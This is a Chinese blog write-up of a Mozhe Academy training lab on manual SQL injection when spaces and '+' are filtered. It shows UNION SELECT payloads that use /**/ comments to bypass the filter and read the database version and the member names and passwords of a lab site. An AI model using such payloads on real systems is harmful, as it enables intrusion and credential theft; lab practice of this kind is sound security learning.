墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)
2018-09-28 16:12
525 查看
版权声明:原创 多崎巡礼,未经许可禁止转载! https://blog.csdn.net/qq_42357070/article/details/82885533
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了;
(过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧)
和以往的套路一样,猜得到字段是4个。。。
http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4
url编码构造如下
md这墨者真的是有毒,就不能一个个写清楚嘛??!
http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/2,1
url编码构造
自己构造去,写成这样够給意思了
阅读更多
相关文章推荐
- php 过滤特殊字符及sql防注入代码
- php 过滤特殊字符及sql防注入代码
- 手工注入方法,方便大家测试程序漏洞
- 软件测试之sql注入漏洞
- DVWA漏洞测试之SQL注入
- Belkatalog CMS SQL 注入漏洞(图)
- asp.net防SQL/JS注入攻击:过滤标记
- 读书笔记之SQL注入漏洞和SQL调优
- SQL注入测试工具:Pangolin(穿山甲)
- 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令
- 参数化查询---解决sql漏洞注入
- Cisco IOS HTTP Server代码注入漏洞详细分析与渗透测试
- 比较好用的PHP防注入漏洞过滤函数代码
- sql注入之手工注入示例详解
- 过滤SQL特殊字符
- sql 注入 替换输入字符
- sql website注入 渗透测试
- SQL注入漏洞全接触--入门篇
- 手工MSSQL注入常用SQL语句
- asp.net core mvc 统一过滤参数,防止注入漏洞攻击